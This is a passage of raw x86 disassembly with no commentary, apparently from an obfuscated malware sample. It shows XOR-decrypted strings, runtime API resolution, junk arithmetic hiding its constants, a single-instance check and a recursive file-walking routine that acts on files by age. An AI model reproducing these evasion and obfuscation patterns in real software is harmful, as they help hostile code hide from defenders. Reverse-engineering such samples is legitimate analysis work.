pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5D0 proc near ; CODE XREF: .data:0041A5AF�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_425DD9
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_425DD9
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_425DD9
mov [ebp+var_C], eax
push 1001401Eh
push [ebp+var_8]
call sub_425DCD
mov ds:10014008h, eax
push 1001401Ch
push [ebp+var_4]
call sub_425DCD
mov ds:10014004h, eax
push 1001401Ch
push [ebp+var_C]
call sub_425DCD
add esp, 30h
mov ds:1001400Ch, eax
mov edi, ds:10014004h
or edi, edi
jz short loc_41A649
push 0
push edi
call sub_425E15
add esp, 8
loc_41A649: ; CODE XREF: sub_41A5D0+6C�j
mov edi, ds:1001400Ch
or edi, edi
jz short loc_41A663
push 0
push edi
call sub_425E15
add esp, 8
call sub_41A669
loc_41A663: ; CODE XREF: sub_41A5D0+81�j
pop edi
leave
retn
sub_41A5D0 endp
; ---------------------------------------------------------------------------
db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A669 proc near ; CODE XREF: sub_41A5D0+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_425DB5
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_41A6A1
; ---------------------------------------------------------------------------
loc_41A685: ; CODE XREF: sub_41A669+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_41A68D
inc [ebp+var_C]
loc_41A68D: ; CODE XREF: sub_41A669+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_41A6A1: ; CODE XREF: sub_41A669+1A�j
cmp byte ptr [ebx], 0
jnz short loc_41A685
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_425DFD
pop ecx
mov [ebp+var_8], eax
mov ds:10014010h, eax
cmp [ebp+var_8], 0
jnz short loc_41A6CF
xor eax, eax
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A6CF: ; CODE XREF: sub_41A669+60�j
mov ebx, [ebp+var_10]
jmp short loc_41A719
; ---------------------------------------------------------------------------
loc_41A6D4: ; CODE XREF: sub_41A669+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_41A713
push [ebp+var_4]
call sub_425DFD
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_41A701
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A701: ; CODE XREF: sub_41A669+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_425E21
add esp, 8
add [ebp+var_8], 4
loc_41A713: ; CODE XREF: sub_41A669+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_41A719: ; CODE XREF: sub_41A669+69�j
cmp byte ptr [ebx], 0
jnz short loc_41A6D4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_41A72C: ; CODE XREF: sub_41A669+64�j
; sub_41A669+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A669 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10015CC4h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_41A75D
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41A7A5
; ---------------------------------------------------------------------------
loc_41A75D: ; CODE XREF: .data:0041A74B�j
push 10015C34h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_41A77D
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41A7A5
; ---------------------------------------------------------------------------
loc_41A77D: ; CODE XREF: .data:0041A76B�j
push 10015C04h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_41A79D
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41A7A5
; ---------------------------------------------------------------------------
loc_41A79D: ; CODE XREF: .data:0041A78B�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41A7A5: ; CODE XREF: .data:0041A75B�j
; .data:0041A77B�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 15Ch
push ebx
push esi
push edi
call sub_41B3AE
call sub_41B1A7
call sub_425250
call sub_41D241
call sub_422C0C
call sub_422341
call sub_4230AA
call sub_41B7EE
call sub_420DEC
mov esi, eax
loc_41A7E7: ; CODE XREF: .data:0041A83D�j
call sub_4234DB
mov edx, eax
mov [ebp-144h], dl
movzx eax, byte ptr [ebp-144h]
mov edx, ds:10014178h
sub edx, 3
cmp eax, edx
jnz short loc_41A817
mov eax, ds:1001424Ch
sub eax, 8
push eax
call dword ptr ds:10013840h
loc_41A817: ; CODE XREF: .data:0041A806�j
movzx eax, byte ptr [ebp-144h]
mov edx, ds:10014100h
sub edx, 6
cmp eax, edx
jnz short loc_41A83F
movsx eax, word ptr ds:10014160h
add eax, 5Eh
push eax
call dword ptr ds:1001380Ch
pop ecx
jmp short loc_41A7E7
; ---------------------------------------------------------------------------
loc_41A83F: ; CODE XREF: .data:0041A829�j
or esi, esi
jnz loc_41A901
push 10015B94h
call sub_41B08F
mov [ebp-154h], eax
push 10015B8Ah
call sub_41B08F
push eax
mov edx, [ebp-154h]
push edx
lea edx, [ebp-143h]
push edx
call dword ptr ds:10013810h
lea eax, [ebp-143h]
push eax
push 0
push 0
call dword ptr ds:100137ECh
mov edi, eax
push 10015B7Eh
call sub_41B08F
mov [ebp-158h], eax
push 10015B74h
call sub_41B08F
mov edx, ds:10014240h
add edx, 5
push edx
push eax
mov edx, [ebp-158h]
push edx
lea edx, [ebp-143h]
push edx
call dword ptr ds:10013810h
add esp, 2Ch
lea eax, [ebp-143h]
push eax
push 1
push 0
call dword ptr ds:100137ECh
mov edi, eax
or edi, edi
jnz short loc_41A8EB
mov eax, ds:10014158h
sub eax, 7
push eax
call dword ptr ds:10013840h
loc_41A8EB: ; CODE XREF: .data:0041A8DA�j
mov eax, ds:1001414Ch
add eax, 0FFFFFFF7h
add eax, ds:100141A0h
push eax
push edi
call dword ptr ds:10013808h
loc_41A901: ; CODE XREF: .data:0041A841�j
push 0
call dword ptr ds:10010598h
mov ebx, eax
push 10015B6Ah
call sub_41B08F
mov [ebp-20h], eax
mov [ebp-34h], ebx
lea eax, ds:1000B6E4h
mov [ebp-40h], eax
push 7F00h
push 0
call dword ptr ds:100111E4h
mov [ebp-2Ch], eax
push 7F03h
push 0
call dword ptr ds:100137F4h
mov [ebp-30h], eax
and dword ptr [ebp-24h], 0
push 0
call dword ptr ds:1000F0D0h
mov [ebp-28h], eax
mov dword ptr [ebp-44h], 3
movsx eax, word ptr ds:10014180h
sub eax, 5
mov [ebp-3Ch], eax
mov eax, ds:10014244h
sub eax, 9
mov [ebp-38h], eax
lea eax, [ebp-44h]
push eax
call dword ptr ds:10010090h
push 10015B60h
call sub_41B08F
mov [ebp-15Ch], eax
push 10015B56h
call sub_41B08F
push 0
push ebx
push 0
push 0
mov edx, ds:100141E8h
sub edx, 7
push edx
mov edx, ds:10014158h
add edx, ds:100140A4h
sub edx, 11h
push edx
movsx edx, word ptr ds:10014114h
sub edx, 9
push edx
mov edx, ds:1001417Ch
sub edx, 9
push edx
push 0CA0000h
push eax
mov edx, [ebp-15Ch]
push edx
movsx edx, word ptr ds:100140B8h
add edx, ds:10014104h
sub edx, 0Dh
push edx
call dword ptr ds:10012820h
mov ds:100105C0h, eax
lea eax, [ebp-148h]
push eax
push ebx
call sub_41B6BE
mov [ebp-14Ch], eax
mov ds:100137E0h, eax
mov eax, [ebp-148h]
mov ds:100105C4h, eax
push 0
call sub_422CF3
add esp, 18h
or esi, esi
jnz short loc_41AA3A
call sub_422ED8
mov eax, ds:100140A4h
sub eax, 9
mov ds:10013818h, eax
jmp short loc_41AA4F
; ---------------------------------------------------------------------------
loc_41AA3A: ; CODE XREF: .data:0041AA24�j
mov eax, ds:100141A8h
add eax, 3A8Fh
add eax, ds:1001409Ch
mov ds:10013818h, eax
loc_41AA4F: ; CODE XREF: .data:0041AA38�j
lea eax, [ebp-150h]
push eax
movsx eax, word ptr ds:10014190h
add eax, ds:10014214h
sub eax, 6
push eax
push 0
push 10005040h
mov eax, ds:10014174h
add eax, ds:100140CCh
sub eax, 8
push eax
push 0
call dword ptr ds:10013D70h
push eax
call dword ptr ds:1001282Ch
or esi, esi
jnz short loc_41AAB0
call sub_41E931
call sub_41BD54
jmp short loc_41AAB0
; ---------------------------------------------------------------------------
loc_41AA9C: ; CODE XREF: .data:0041AAD8�j
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1001395Ch
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000E004h
loc_41AAB0: ; CODE XREF: .data:0041AA8E�j
; .data:0041AA9A�j
mov eax, ds:1001414Ch
add eax, ds:100140CCh
sub eax, 0Eh
push eax
movsx eax, word ptr ds:100140E4h
sub eax, 2
push eax
push 0
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:10012800h
or eax, eax
jnz short loc_41AA9C
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2000h
call sub_425D5D
push esi
push edi
push 1FFFh
lea eax, [ebp-1FFFh]
push eax
push dword ptr [ebp+8]
call dword ptr ds:10013D88h
push 10015B41h
call sub_41B08F
movsx edi, word ptr ds:100140B4h
sub edi, 3
push edi
push eax
lea edi, [ebp-1FFFh]
push edi
call sub_4251A5
add esp, 10h
mov esi, ds:10014178h
add esi, 0FFF1h
add esi, ds:1001424Ch
cmp eax, esi
jz short loc_41AB49
push dword ptr [ebp+8]
call sub_41DBB8
pop ecx
loc_41AB49: ; CODE XREF: .data:0041AB3E�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB52 proc near ; CODE XREF: sub_41F4A9+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call dword ptr ds:1001120Ch
pop ebp
retn
sub_41AB52 endp
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 18h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB71 proc near ; CODE XREF: .data:loc_41F43F�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, ds:10014178h
add eax, ds:100141A8h
sub eax, 0Dh
push eax
push 0
push 21h
push 0
call dword ptr ds:10010A00h
mov ebx, eax
or ebx, ebx
jnz loc_41ACAB
lea eax, [ebp+var_10]
push eax
call dword ptr ds:10011420h
movzx eax, [ebp+var_6]
movzx edx, [ebp+var_8]
movsx ecx, word ptr ds:10014148h
add ecx, 3Ch
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_A]
mov ecx, ds:1001424Ch
add ecx, 0Fh
imul edx, ecx
movsx ecx, word ptr ds:10014098h
mov ebx, ds:10014184h
lea ecx, [ecx+ebx+36h]
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_E]
mov ecx, ds:100141CCh
add ecx, 1Dh
imul edx, ecx
mov ecx, ds:100140CCh
add ecx, 12h
imul edx, ecx
movsx ecx, word ptr ds:10014220h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_10]
mov ecx, ds:100140A4h
movsx ebx, word ptr ds:10014190h
add ecx, ebx
sub ecx, 2
imul edx, ecx
movsx ecx, word ptr ds:100140B8h
add ecx, 15h
imul edx, ecx
mov ecx, ds:100141ECh
add ecx, 0Eh
add ecx, ds:10014104h
imul edx, ecx
mov ecx, ds:10014218h
add ecx, 2Ah
movsx ebx, word ptr ds:100141C0h
add ecx, ebx
imul edx, ecx
add eax, edx
mov ds:1000D028h, eax
mov eax, ds:100141F8h
add eax, ds:10014168h
sub eax, 0Eh
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_41ACB0
add esp, 144h
loc_41ACAB: ; CODE XREF: sub_41AB71+32�j
pop edi
pop esi
pop ebx
leave
retn
sub_41AB71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACB0 proc near ; CODE XREF: sub_41AB71+12F�p
; sub_41ACB0+216�p ...
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
push ebp
mov ebp, esp
sub esp, 274h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push 10015B39h
call sub_41B08F
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10013810h
add esp, 10h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1001121Ch
mov [ebp+var_248], eax
mov eax, ds:1001418Ch
add eax, ds:10014188h
sub eax, 9
neg eax
cmp [ebp+var_248], eax
jnz loc_41AE7A
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call dword ptr ds:10013960h
mov [ebp+var_260], eax
movsx eax, word ptr ds:1001421Ch
add eax, ds:1001410Ch
sub eax, 6
cmp [ebp+var_260], eax
jle short loc_41AD4C
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_41AD57
; ---------------------------------------------------------------------------
loc_41AD4C: ; CODE XREF: sub_41ACB0+8D�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_41AD57: ; CODE XREF: sub_41ACB0+9A�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call dword ptr ds:10013958h
movsx eax, word ptr ds:100140C4h
mov [ebp+var_270], eax
mov edx, ds:10014154h
add edx, 1Bh
mov ecx, ds:100140FCh
mov [ebp+var_26C], ecx
movzx esi, [ebp+var_24E]
movzx edi, [ebp+var_250]
mov ecx, eax
add ecx, 33h
imul edi, ecx
mov ecx, esi
add ecx, edi
movzx esi, [ebp+var_252]
mov edi, ds:100140A4h
add edi, 0Fh
imul esi, edi
movsx edi, word ptr ds:10014194h
add edi, 33h
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_256]
mov edi, edx
add edi, ds:100140D4h
imul esi, edi
mov edi, ds:100141D0h
add edi, 0Ch
mov eax, [ebp+var_26C]
add edi, eax
mov eax, esi
imul eax, edi
mov esi, ds:100140FCh
add esi, 35h
imul eax, esi
add ecx, eax
movzx eax, [ebp+var_258]
mov esi, ds:1001415Ch
add esi, 0Ch
imul eax, esi
imul eax, edx
mov edx, ds:10014244h
add edx, 6
mov esi, [ebp+var_270]
add edx, esi
imul eax, edx
movsx edx, word ptr ds:10014180h
add edx, 37h
imul eax, edx
mov edx, ecx
add edx, eax
mov [ebp+var_25C], edx
mov eax, edx
mov edx, ds:1000D028h
cmp eax, edx
ja loc_41AF43
sub edx, eax
movsx eax, word ptr ds:10014194h
add eax, 10D7h
cmp edx, eax
jbe loc_41AF43
push [ebp+arg_0]
call dword ptr ds:1000D008h
mov [ebp+var_274], eax
jmp loc_41AF43
; ---------------------------------------------------------------------------
loc_41AE7A: ; CODE XREF: sub_41ACB0+5D�j
cmp [ebp+var_112], 2Eh
jz loc_41AF3F
push 10015B30h
call sub_41B08F
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10013810h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41ACB0
add esp, 158h
jmp short loc_41AF3F
; ---------------------------------------------------------------------------
loc_41AED3: ; CODE XREF: sub_41ACB0+291�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call dword ptr ds:1000EFB4h
mov ebx, eax
or ebx, ebx
jz short loc_41AF43
cmp [ebp+var_112], 2Eh
jz short loc_41AF3F
push 10015B27h
call sub_41B08F
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10013810h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41ACB0
add esp, 158h
loc_41AF3F: ; CODE XREF: sub_41ACB0+1D1�j
; sub_41ACB0+221�j ...
or ebx, ebx
jnz short loc_41AED3
loc_41AF43: ; CODE XREF: sub_41ACB0+19A�j
; sub_41ACB0+1B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41ACB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF48 proc near ; CODE XREF: .data:loc_424ABE�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, ds:100140A4h
add eax, ds:1001409Ch
sub eax, 0Ah
push eax
push 0
push 20h
push 0
call dword ptr ds:10010A00h
lea eax, [ebp+var_10]
push eax
call dword ptr ds:10011420h
mov eax, ds:100141E4h
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_8]
mov ebx, ds:1001409Ch
add ebx, 37h
movsx esi, word ptr ds:100140E8h
add ebx, esi
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_A]
mov ebx, ds:100141E8h
add ebx, 11h
movsx esi, word ptr ds:10014148h
add ebx, esi
imul ecx, ebx
mov ebx, ds:100141D8h
add ebx, 38h
add ebx, ds:10014184h
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_E]
mov ebx, ds:100140D4h
add ebx, 19h
movsx esi, word ptr ds:10014190h
add ebx, esi
imul ecx, ebx
mov ebx, ds:100141E4h
add ebx, 17h
imul ecx, ebx
mov ebx, ds:10014150h
add ebx, 32h
add ebx, ds:1001414Ch
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_10]
mov ebx, ds:100140FCh
add ebx, 4
add ebx, ds:100141C4h
imul ecx, ebx
mov ebx, ds:1001419Ch
add ebx, 15h
add ebx, ds:1001415Ch
imul ecx, ebx
movsx ebx, word ptr ds:10014120h
lea eax, [eax+ebx+0Eh]
imul ecx, eax
movsx eax, word ptr ds:10014110h
add eax, 3Ch
imul ecx, eax
mov eax, edx
add eax, ecx
mov ds:1000D028h, eax
mov eax, ds:100140E0h
dec eax
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_41D8BA
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_41AF48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B08F proc near ; CODE XREF: .data:0041A84C�p
; .data:0041A85C�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10014250h, 0
jnz short loc_41B0B7
push 10013DA0h
call dword ptr ds:1000EFB8h
mov dword ptr ds:10014250h, 1
loc_41B0B7: ; CODE XREF: sub_41B08F+11�j
mov esi, ds:10014124h
inc esi
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:10014158h
sub edx, 5
cmp eax, edx
jz short loc_41B15D
push 10013DA0h
call dword ptr ds:1001383Ch
mov eax, ds:100141ACh
sub eax, 2
mov [ebp+var_2], ax
jmp short loc_41B115
; ---------------------------------------------------------------------------
loc_41B100: ; CODE XREF: sub_41B08F+90�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_41B115: ; CODE XREF: sub_41B08F+6F�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_41B100
movsx eax, word ptr ds:10014160h
add eax, ds:10014224h
sub eax, 0Bh
mov edx, ds:10014100h
sub edx, 7
mov [edi+eax], dl
mov eax, ds:100141D8h
sub eax, 2
movsx edx, word ptr ds:100140C4h
sub edx, 9
mov [edi+eax], dl
push 10013DA0h
call dword ptr ds:10012824h
loc_41B15D: ; CODE XREF: sub_41B08F+56�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_41B08F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41B168: ; CODE XREF: .data:0041B1A1�j
movsx eax, word ptr ds:10014148h
movsx edx, word ptr ds:10014098h
add eax, edx
sub eax, 5
push eax
call dword ptr ds:1001380Ch
pop ecx
movsx eax, word ptr ds:100140F4h
add eax, ds:100141A4h
sub eax, 8
push eax
push 100016D4h
push 0
call dword ptr ds:1000DFFCh
jmp short loc_41B168
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41B1A7 proc near ; CODE XREF: .data:0041A7BD�p
push edi
push 10015B1Ah
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014260h, eax
test eax, eax
jnz short loc_41B1DA
push 10015B0Dh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014260h, eax
loc_41B1DA: ; CODE XREF: sub_41B1A7+1A�j
push 10015AFEh
call sub_41B08F
push eax
push dword ptr ds:10014260h
call dword ptr ds:100101ACh
mov ds:10011214h, eax
push 10015AECh
call sub_41B08F
add esp, 8
push eax
push dword ptr ds:10014260h
call dword ptr ds:100101ACh
mov ds:1000F0D0h, eax
pop edi
retn
sub_41B1A7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+18h]
mov [ebp+18h], ax
mov eax, ds:100140F0h
add eax, 0BFh
movsx edx, word ptr ds:10014120h
add eax, edx
cmp [ebp+0Ch], eax
jnz loc_41B352
mov word ptr [ebp-18h], 3
lea eax, [ebp-10h]
push eax
mov eax, ds:10014360h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp-4], eax
movsx eax, word ptr ds:10014210h
add eax, ds:100140ECh
sub eax, 0Ch
cmp [ebp-4], eax
jnz loc_41B34E
dec dword ptr [ebp-10h]
lea eax, [ebp-1Ch]
push eax
lea esi, [ebp-18h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10014360h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp-4], eax
mov eax, ds:10014138h
movsx edx, word ptr ds:100140A0h
add eax, edx
sub eax, 6
cmp [ebp-4], eax
jnz loc_41B34E
lea eax, [ebp-20h]
push eax
push 10015CD4h
mov eax, [ebp-1Ch]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
movsx eax, word ptr ds:10014160h
sub eax, 6
cmp [ebp-4], eax
jnz short loc_41B345
lea eax, ds:1001435Ch
mov [ebp-8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp-24h]
push eax
push 10015C04h
mov eax, [ebp-8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:100140D8h
sub eax, 5
cmp [ebp-4], eax
jnz short loc_41B333
lea eax, [ebp-2Ch]
push eax
push 10015C04h
push dword ptr [ebp-24h]
push dword ptr [ebp-20h]
call sub_424E34
add esp, 10h
mov [ebp-28h], eax
mov eax, [ebp-24h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41B333: ; CODE XREF: .data:0041B30E�j
mov eax, [ebp-8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp-20h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41B345: ; CODE XREF: .data:0041B2D9�j
mov eax, [ebp-1Ch]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_41B34E: ; CODE XREF: .data:0041B26E�j
; .data:0041B2AD�j
xor eax, eax
jmp short loc_41B357
; ---------------------------------------------------------------------------
loc_41B352: ; CODE XREF: .data:0041B23D�j
mov eax, 80020003h
loc_41B357: ; CODE XREF: .data:0041B350�j
pop edi
pop esi
pop ebx
leave
retn 24h
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B366 proc near ; CODE XREF: sub_41B754+9�p
; sub_420DEC+C�p ...
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
cmp dword ptr ds:10014280h, 0
jz short loc_41B37D
xor eax, eax
inc eax
jmp short locret_41B3AC
; ---------------------------------------------------------------------------
loc_41B37D: ; CODE XREF: sub_41B366+10�j
mov [ebp+var_94], 94h
lea eax, [ebp+var_94]
push eax
call dword ptr ds:10013D78h
cmp [ebp+var_84], 2
jnz short loc_41B3A7
mov dword ptr ds:10014280h, 1
loc_41B3A7: ; CODE XREF: sub_41B366+35�j
mov eax, ds:10014280h
locret_41B3AC: ; CODE XREF: sub_41B366+15�j
leave
retn
sub_41B366 endp
; =============== S U B R O U T I N E =======================================
sub_41B3AE proc near ; CODE XREF: .data:0041A7B8�p
push edi
push 10015ADEh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:1001425Ch, eax
test eax, eax
jnz short loc_41B3E1
push 10015AD0h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:1001425Ch, eax
loc_41B3E1: ; CODE XREF: sub_41B3AE+1A�j
push 10015ABDh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100137DCh, eax
push 10015AAAh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10012820h, eax
push 10015A98h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100105C8h, eax
push 10015A87h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100111E8h, eax
push 10015A73h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1000E004h, eax
push 10015A62h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1000EFC0h, eax
push 10015A4Bh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100105A4h, eax
push 10015A3Ch
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10012800h, eax
push 10015A2Fh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1000D004h, eax
push 10015A1Dh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100137FCh, eax
push 10015A0Ch
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10013830h, eax
push 100159FAh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10013D88h, eax
push 100159EBh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100111E4h, eax
push 100159DEh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:100137F4h, eax
push 100159CFh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:10013820h, eax
push 100159C1h
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
mov ds:1000DFF0h, eax
push 100159AFh
call sub_41B08F
push eax
push dword ptr ds:1001425Ch
call dword ptr ds:100101ACh
